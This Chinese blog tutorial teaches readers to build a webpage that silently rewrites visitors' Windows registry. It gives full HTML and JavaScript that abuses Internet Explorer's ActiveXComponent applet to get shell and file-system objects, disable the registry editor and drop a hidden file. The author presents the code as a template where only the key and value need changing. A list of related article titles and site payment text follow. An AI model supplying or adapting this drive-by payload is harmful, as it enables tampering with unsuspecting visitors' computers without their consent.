如何利用网页改写注册表

我们上网时常见到一些:"注册表被某某网站改写"或者"上了某某网站后,开机时会弹出对话框。"等等这一类的现象。其实,都只是一些网站利用简单的HTML编程改写注册表而实现的。那么现在,就让我们来对其作进一步的了解,看这究竟是怎么一回事儿!
不知大家对Windows系统注册表了解有多少?我们知道,在Windows系统下,我们可以编写注册表脚本文件『*.reg』来实现对注册表的改写。先让我们来看一个注册表脚本文件:
程序代码 程序代码

REGEDIT 4
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]
"DisableRegistryTools"=DWORD:00000001


不知大家看懂没?以上这个注册表脚本是锁住注册表编辑器。好了,注册表脚本编好了,再让我们看看怎样将其与HTML结合。
以下是一个HTML源码:

程序代码 程序代码

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=****>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
sh = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
fo = a1.GetObject();
if (documents.cookie.indexOf("km169set") == -1)
{
sh.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//DisableRegistryTools", 1,"REG_DWORD");
hd=fo.createTextFile();
hd.write();
hd.close();
file=fo.GetFile("c://yntop.htm");
file.Attributes=6;
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{
}
}

function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
</HEAD>
</HTML>


我们注意到在上面这个HTML源码中,有一行:"HKCU//Software//Microsoft//Windows// CurrentVersion//Policies//System//DisableRegistryTools", 1,"REG_DWORD",拿这一行与上面那个注册表脚本比较一下,我们就可以发现,它们唯一的不同除了连接符不一样,还有书写格式的细小区别。但是这其中的区别不用我说也能够发现。下面我们来仔细看一下这段HTML源码中其他的一些语句。
相信大家都已经看出,这段HTML源码是利用****来实现对注册表的改写,其中最关键的一句也就是:

程序代码 程序代码

sh.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//DisableRegistryTools", 1,"REG_DWORD");


这也就是写入注册表的语句:sh.RegWrite。其格式为:"sh.RegWrite("注册表键",键值,"键值类型");"。如果大家要改,只要将括号里的内容改成自己的内容,其他的均可套用,作成一个最简单的网页。
好了,在这篇文章里,我只向大家介绍怎样编写一个简单的能改写注册表的网页,其他关于注册表的内容,我就不在这里详述了。最后毛窝要声明一点:本片文章内容有一定的危险,请大家慎重使用!
 
HTML页面修改注册表解密 -------------------------------------------------------------------------------- No. File Name Title Size 1 ActiveX技术综述.htm ActiveX技术综述 10K 2 IE恶意修改之终极解决方案.htm IE恶意修改之终极解决方案 10K 3 IE又一漏洞解.htm IE又一漏洞解 2K 4 IE在安装组件时候存在.htm IE在安装组件时候存在 2K 5 txt文件病毒.htm txt文件病毒 5K 6 Windows NT 4.htm Windows NT 4 3K 7 当心.htm 当心 10K 8 杜绝IE浏览的安全隐患.htm 杜绝IE浏览的安全隐患 5K 9 恶意修改IE的恢复方法.htm 恶意修改IE的恢复方法 5K 10 分析一个网站的恶意代码.htm 分析一个网站的恶意代码 20K 11 关于在浏览器中执行.htm 关于在浏览器中执行 5K 12 浏览网页注册表修改之迷及解决办法.htm 浏览网页注册表修改之迷及解决办法 8K 13 深入剖析恶意攻击性网页.htm 深入剖析恶意攻击性网页 22K 14 深入剖析通过嵌入ActiveXComponent执行ActiveX对象漏洞.htm 深入剖析通过嵌入ActiveXComponent执行ActiveX对象漏洞 18K 15 通过在html嵌入Javascript逃避hotmail过滤检查获得用户信息.htm 通过在html嵌入Javascript逃避hotmail过滤检查获得用户信息 4K 16 图解:摆脱可恶网站的阴影.htm 图解:摆脱可恶网站的阴影 17K 17 网页攻击教学.htm 网页攻击教学 3K 18 写网页病毒很容易.htm 写网页病毒很容易 3K 19 隐藏在网页中的程序.htm 隐藏在网页中的程序 3K 20 用脚本文件简单修改注册表.htm 用脚本文件简单修改注册表 8K 21 抓住网页恶意代码的黑手.htm 抓住网页恶意代码的黑手 19K
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值